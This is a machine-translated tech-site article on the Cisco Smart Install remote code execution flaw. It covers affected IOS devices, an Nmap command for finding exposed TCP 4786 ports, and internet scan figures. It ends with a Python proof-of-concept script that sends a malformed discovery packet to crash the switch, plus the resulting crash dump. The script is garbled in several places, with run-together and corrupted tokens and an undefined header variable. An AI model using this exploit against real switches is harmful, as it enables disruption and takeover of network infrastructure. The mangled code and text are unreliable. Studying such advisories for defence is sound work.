Shulou(Shulou.com)05/31 Report--

How to analyze the remote code execution vulnerability of Cisco Smart Install? aiming at this problem, this article introduces the corresponding analysis and answer in detail, hoping to help more partners who want to solve this problem to find a more simple and easy way.

I. brief introduction

System: Cisco IOS,Cisco IOS-XE

Vendor: Cisco

Vulnerability: buffer stack overflow vulnerability [CWE-20] [CWE-21]

Hazard: high risk, AV:N/AC:L/Au:N/C:C/I:C/A:C

The researchers found a buffer stack overflow vulnerability in the Smart Install Client code. An attacker can exploit this vulnerability to remotely execute arbitrary code without authentication. In other words, the attacker can take full control of the network devices affected by the vulnerability.

The Smart Install function is a plug-and-play configuration and image management function for deploying switches. It automatically initializes and loads a mirror of the current operating system for the new network switch. This means that users can send one switch to another address and place it on the network, starting the switch without configuration and administrator. This technique also provides a backup of the configuration when the device configuration changes or hot-swappable damaged devices.

A network that uses Smart Install consists of a set of network devices called client, which are served by a layer 3 switch or router as their director.

Director provides a single point of management for mirroring and configuration of client switches. The client switch is directly or indirectly connected to the director, so it can receive downloaded images and configurations.

You can learn more about Smart Install technology through the official documentation.

It is worth noting that the Smart Install client is enabled by default, so the coverage and harmfulness of the vulnerability are self-evident, which will be discussed later.

Second, vulnerability description

The SMI IBC Server Process process contains the implementation code for Smart Install Client. Smart Install Client enables the service on the TCP (4786) port (enabled by default) to interact with Smart Install Director.

A buffer stack overflow occurs when the service processes a specially constructed malicious message ibd_init_discovery_msg.

More specifically, this overflow occurs in smi_ibc_handle_ibd_init_discovery_msg

Because the size of the data copied to the fixed size buffer is not checked. The size and data are obtained directly from the network packet and are controlled by the attacker.

III. Award-winning project of GeekPwn2017 Hong Kong Station

George Nosenko, a white hat hacker from security company Embedi, successfully demonstrated the vulnerability at the Hong Kong station of the GeekPwn2017 hacker contest and won the "Best Technology Award" with a total prize of 250000 yuan.

According to the scenario requirements of the competition, contestants are required to complete the following two challenges on the Cisco Catalyst 2960 switch:

1. Reset or replace the enable password to obtain the permission for EXEC mode:

Https://v.qq.com/x/page/z0616f2f7q8.html

2. Hijack the network traffic between the switch and other devices:

Https://v.qq.com/x/page/y0616rq52ca.html

More technical details and exploit writing can be found in the article "How To Cook Cisco".

Fourth, vulnerability detection

If your Cisco network device has an open TCP 4786 port, it will be affected by the vulnerability. You can find devices like this by scanning:

Nmap-pT:4786 192.168.1.0 Universe 24

To detect whether the network device has the Smart Install Client function, you can try the following command:

Switch > showvstack configRole:Client (SmartInstall enabled) VstackDirector IP address: 0.0.0.0switch > showtcp brief allTCBLocal Address Foreign Address (state) 0344B794*.4786 *. * LISTEN0350A018*.443 *. * LISTEN03293634*.443 *. * LISTEN03292D9C*.80 *. * LISTEN03292504*.80 *. * LISTEN

5. Internet scan results

When we found this loophole, we thought it could only be used for internal attacks. Because the security configuration of the network Smart Install technology can not be accessed through the Internet.

But after scanning the network, we found that this was not the case.

After a short network scan, we immediately found about 250000 vulnerable devices and 8.5 million vulnerable ports open devices.

Perhaps this is because the Smart Install client port TCP (4786) is open by default, and the network administrator is not aware of the possible security problems.

VI. Software and hardware affected by vulnerabilities

Devices that have been verified to be vulnerable include Catalyst 4500Supervisor Engines, CiscoCatalyst 3850 SeriesSwitches, and CiscoCatalyst 2960 SeriesSwitches.

Cisco Catalyst 4500 SupervisorEngine 6L-E

Cisco IOS 15.2.2E6 (Latest,Suggested)

Cat4500e-entservicesk9-mz.152-2.E6.bin (23-DEC-2016)

Cisco Catalyst 2960-48TT-L Switch

Cisco IOS 12.2 (55) SE11 (Suggested)

C2960-lanbasek9-mz.122-55.SE11.bin (18-AUG-2016)

Cisco IOS 15.0.2-SE10a (Latest)

C2960-lanbasek9-mz.150-2.SE10a.bin (10-NOV-2016)

Cisco Catalyst 3850-24P-E Switch

Cisco IOS-XE 03.03.05.SE

Cat3k_caa-universalk9.SPA.03.03.05.SE.150-1.EZ5.bin (03-NOV-2014)

In addition, all devices with Smart Install Client may be affected by the vulnerability, including the following:

Catalyst 4500 Supervisor Engines

Catalyst 3850 Series

Catalyst 3750 Series

Catalyst 3650 Series

Catalyst 3560 Series

Catalyst 2960 Series

Catalyst 2975 Series

IE 2000

IE 3000

IE 3010

IE 4000

IE 4010

IE 5000

SM-ES2 SKUs

SM-ES3 SKUs

NME-16ES-1G-P

SM-X-ES3 SKUs

For more information, you can check:

CiscoSecurity Advisory

Cisco Feature Navigator

Supported Devices for Smart Install

7. POC#smi_ibc_init_discovery_BoF.pyimportsocketimportstructfromoptparse import OptionParser# Parsethe target optionsparser = OptionParser () parser.add_option ("- t", "--target", dest= "target", help= "Smart InstallClient", default= "192.168.1.1") parser.add_option ("- p", "- port", dest= "port", type= "int", help= "Portof Client", default=4786) (options, args) = parser.parse_args () defcraft_tlv (t, v, tactifmtfragments I'): return struct.pack (tweefmtdagt) + struct.pack (l_fmt, len (v)) + vdefsend_packet (sock, packet): sock.send (packet) defreceive (sock): returnsock.recv () if__name__ = "_ _ main__": print "[*] Connecting to Smart Install Client", options.target, "port", options.portcon = socket.socket (socket.AF_INET, socket.SOCK_STREAM) con.connect ((options.target) Options.port) payload= 'BBBB' * 44 shellcode =' D' * 2048data ='A' * 36 + struct.pack ('! I, len (payload) + len (shellcode) + 40) + payloadtlv_1 = craft_tlv (0x00000001, data) tlv_2 = shellcodepkt = hdr + tlv_1 + tlv_2print "[*] Send a malicious packet" send_packet (con, pkt)

Attack command:

Host$./smi_ibc_init_discovery_BoF.py-t 192.168.1.1

The switch should report an error and restart:

0-Traceback=42424240Writingcrashinfo to flash:/crashinfo_ext/crashinfo_ext_15===Flushing messages (00:10:39 UTC Mon Mar 1 1993) = = Buffered messages:...Queuedmessages:CiscoIOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2 (55) SE11, RELEASESOFTWARE (fc3) TechnicalSupport: http://www.cisco.com/techsupportCopyright(c) 1986-2016 by Cisco Systems Inc.CompiledWed 17-Aug-16 13:46 by prod_rel_teamInstructionTLB Miss Exception (0x1200)! SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000CPURegister Context:Vector = 0x42424240 MSR = 0x00029230 CR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006AR0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFFR12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8R16 = 0x02B1B128 R17 = 0x02B1B128 R18 = 0x02B1B128 R19 = 0x00000000 R21 = 0x00000000 R22 = 0x02B1B128 R23 = 0x02B1B1A8R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242Stacktrace:PC = 0x42424240 SP = 0x02B1B0B0Frame00: SP = 0x42424242 PC = 0x42424242

This is the answer to the question on how to analyze the remote code execution vulnerabilities of Cisco Smart Install. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.